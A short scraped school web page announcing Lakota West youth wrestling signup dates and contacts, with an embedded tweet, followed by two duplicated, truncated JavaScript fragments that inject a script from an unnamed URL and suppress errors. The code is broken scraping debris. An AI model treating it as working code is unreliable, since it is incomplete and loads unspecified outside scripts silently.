Wrestling
Lakota West Kids Club Wrestling Signup Information
Lakota West youth wrestling signups are October 23-24 from 6-7:30p at Lakota West High School. Contact Joe Rieman firebirdyouthwrestling@yahoo.com or Adam Meyer adam.meyer@lakotaonline.com with any questions.
Fall is finally here which means wrestling is right around the corner!! pic.twitter.com/u7Ya6cu8gj
— Lakota West Wrestling (@LWHS_Wrestling) September 26, 2019
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();